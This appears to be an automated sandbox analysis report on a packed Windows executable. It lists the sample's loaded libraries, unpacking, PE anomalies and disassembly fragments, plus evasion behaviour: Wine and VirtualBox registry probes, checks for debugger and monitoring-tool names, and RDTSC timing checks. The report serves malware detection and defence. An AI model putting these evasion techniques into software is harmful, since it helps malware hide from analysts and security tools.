Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: w6cYYyWXqJ.exeVirustotal: Detection: 33%
Source: w6cYYyWXqJ.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: w6cYYyWXqJ.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeSection loaded: kernel.appcore.dllJump to behavior
Source: w6cYYyWXqJ.exeStatic file information: File size 4519424 > 1048576
Source: w6cYYyWXqJ.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x288a00
Source: w6cYYyWXqJ.exeStatic PE information: Raw size of bzvzmdre is bigger than: 0x100000 < 0x1c3000

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeUnpacked PE file: 3.2.w6cYYyWXqJ.exe.e80000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bzvzmdre:EW;syyxadwf:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bzvzmdre:EW;syyxadwf:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: w6cYYyWXqJ.exeStatic PE information: real checksum: 0x450107 should be: 0x450ccc
Source: w6cYYyWXqJ.exeStatic PE information: section name:
Source: w6cYYyWXqJ.exeStatic PE information: section name: .idata
Source: w6cYYyWXqJ.exeStatic PE information: section name:
Source: w6cYYyWXqJ.exeStatic PE information: section name: bzvzmdre
Source: w6cYYyWXqJ.exeStatic PE information: section name: syyxadwf
Source: w6cYYyWXqJ.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_3_00BADDE2 push eax; ret 3_3_00BADE01
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_3_00BADDE2 push eax; ret 3_3_00BADE01
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_3_00BADDE2 push eax; ret 3_3_00BADE01
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_3_00BABDD2 pushfd ; retf 3_3_00BABEA9
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_3_00BABDD2 pushfd ; retf 3_3_00BABEA9
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_3_00BABDD2 pushfd ; retf 3_3_00BABEA9
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_3_00BAF8C0 push ecx; ret 3_3_00BAF8C1
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_3_00BAF8C0 push ecx; ret 3_3_00BAF8C1
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_3_00BAF8C0 push ecx; ret 3_3_00BAF8C1
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_3_00BAF8C0 push ecx; ret 3_3_00BAF8C1
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_3_00BAB87A push ecx; retf 3_3_00BAB8C1
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_3_00BAB87A push ecx; retf 3_3_00BAB8C1
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_3_00BAB87A push ecx; retf 3_3_00BAB8C1
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_3_00BABA72 push ds; retf 3_3_00BABAB9
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_3_00BABA72 push ds; retf 3_3_00BABAB9
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_3_00BABA72 push ds; retf 3_3_00BABAB9
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_3_00BADDE2 push eax; ret 3_3_00BADE01
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_3_00BADDE2 push eax; ret 3_3_00BADE01
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_3_00BADDE2 push eax; ret 3_3_00BADE01
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_3_00BABDD2 pushfd ; retf 3_3_00BABEA9
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_3_00BABDD2 pushfd ; retf 3_3_00BABEA9
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_3_00BABDD2 pushfd ; retf 3_3_00BABEA9
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_3_00BAF8C0 push ecx; ret 3_3_00BAF8C1
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_3_00BAF8C0 push ecx; ret 3_3_00BAF8C1
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_3_00BAF8C0 push ecx; ret 3_3_00BAF8C1
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_3_00BAF8C0 push ecx; ret 3_3_00BAF8C1
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_3_00BAB87A push ecx; retf 3_3_00BAB8C1
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_3_00BAB87A push ecx; retf 3_3_00BAB8C1
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_3_00BAB87A push ecx; retf 3_3_00BAB8C1
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_3_00BABA72 push ds; retf 3_3_00BABAB9
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_3_00BABA72 push ds; retf 3_3_00BABAB9
Source: w6cYYyWXqJ.exeStatic PE information: section name: bzvzmdre entropy: 7.954619105553536

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: w6cYYyWXqJ.exe, 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1301368637.00000000072A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
Source: w6cYYyWXqJ.exe, 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1301368637.00000000072A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
Source: w6cYYyWXqJ.exe, 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1301368637.00000000072A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WINDBG.EXE
Source: w6cYYyWXqJ.exe, 00000003.00000003.1301368637.00000000072A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: w6cYYyWXqJ.exe, 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1301368637.00000000072A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1561927 second address: 156192B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 156192B second address: 1561942 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1561942 second address: 156194C instructions: 0x00000000 rdtsc 0x00000002 jng 00007FEEDCB1F6DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 156194C second address: 156195D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a jc 00007FEEDCB2F2E6h 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 156195D second address: 1561967 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FEEDCB1F6DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 16D897B second address: 16D897F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 16D897F second address: 16D8987 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 16D8987 second address: 16D898D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 16D898D second address: 16D8997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FEEDCB1F6D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 16DEF58 second address: 16DEF5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 16DF271 second address: 16DF27D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007FEEDCB1F6D6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 16E1AC8 second address: 16E1B85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a mov dword ptr [esp], eax 0x0000000d pushad 0x0000000e cmc 0x0000000f mov di, 1979h 0x00000013 popad 0x00000014 push 00000000h 0x00000016 cmc 0x00000017 push 1128FCB4h 0x0000001c jg 00007FEEDCB2F2F0h 0x00000022 xor dword ptr [esp], 1128FC34h 0x00000029 pushad 0x0000002a adc si, B1BFh 0x0000002f call 00007FEEDCB2F2F4h 0x00000034 jmp 00007FEEDCB2F2F6h 0x00000039 pop ecx 0x0000003a popad 0x0000003b mov edi, 3CFFDC04h 0x00000040 push 00000003h 0x00000042 mov dword ptr [ebp+122D21D6h], edi 0x00000048 push 00000000h 0x0000004a sub ecx, 6699CC12h 0x00000050 push 00000003h 0x00000052 mov cx, 2366h 0x00000056 call 00007FEEDCB2F2E9h 0x0000005b jg 00007FEEDCB2F2EAh 0x00000061 push esi 0x00000062 pushad 0x00000063 popad 0x00000064 pop esi 0x00000065 push eax 0x00000066 push eax 0x00000067 push edx 0x00000068 jmp 00007FEEDCB2F2F9h 0x0000006d rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 16E1B85 second address: 16E1B8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 16E1B8B second address: 16E1BAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jns 00007FEEDCB2F2E6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 16E1BAB second address: 16E1BB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 16E1E39 second address: 16E1E3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 16E1E3D second address: 16E1E4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 16E1E4B second address: 16E1E55 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FEEDCB2F2E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 16E1E55 second address: 16E1EA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEEDCB1F6E2h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e xor ecx, 14B77DE2h 0x00000014 or di, 0827h 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push ecx 0x0000001e call 00007FEEDCB1F6D8h 0x00000023 pop ecx 0x00000024 mov dword ptr [esp+04h], ecx 0x00000028 add dword ptr [esp+04h], 00000015h 0x00000030 inc ecx 0x00000031 push ecx 0x00000032 ret 0x00000033 pop ecx 0x00000034 ret 0x00000035 push 840C40EEh 0x0000003a push eax 0x0000003b push edx 0x0000003c push edi 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 16E1EA4 second address: 16E1EA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1703CC8 second address: 1703CCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1703CCC second address: 1703CD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1703CD2 second address: 1703CD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 16D1AFF second address: 16D1B13 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FEEDCB2F2EAh 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007FEEDCB2F2E6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1701A68 second address: 1701A6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1701A6E second address: 1701A72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1701A72 second address: 1701A7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1701A7C second address: 1701A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEEDCB2F2F0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1701D57 second address: 1701D62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FEEDCB1F6D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1702320 second address: 170232A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FEEDCB2F2E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 170232A second address: 1702341 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1702341 second address: 1702345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1702345 second address: 1702349 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1702498 second address: 17024CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2F7h 0x00000007 jmp 00007FEEDCB2F2EFh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jbe 00007FEEDCB2F2E6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1702610 second address: 1702616 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1702616 second address: 170261F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 170261F second address: 170264F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 jmp 00007FEEDCB1F6E7h 0x0000000e push edi 0x0000000f jmp 00007FEEDCB1F6DAh 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 170264F second address: 1702655 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1702655 second address: 1702659 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17028EC second address: 1702904 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEEDCB2F2F2h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1702904 second address: 1702908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1702908 second address: 170290C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1702A7B second address: 1702A81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1702A81 second address: 1702A85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1702A85 second address: 1702A9D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FEEDCB1F6D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007FEEDCB1F6DEh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1702A9D second address: 1702AB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2EAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1702AB1 second address: 1702ABB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FEEDCB1F6D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1702ABB second address: 1702ABF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1702ABF second address: 1702ADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEEDCB1F6E8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 16D36B1 second address: 16D36B9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17033CE second address: 17033D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17037B9 second address: 17037C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17037C2 second address: 17037C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17037C9 second address: 170380A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FEEDCB2F2E6h 0x00000009 jmp 00007FEEDCB2F2ECh 0x0000000e jmp 00007FEEDCB2F2EEh 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 js 00007FEEDCB2F2E6h 0x0000001c jmp 00007FEEDCB2F2F5h 0x00000021 rdtsc
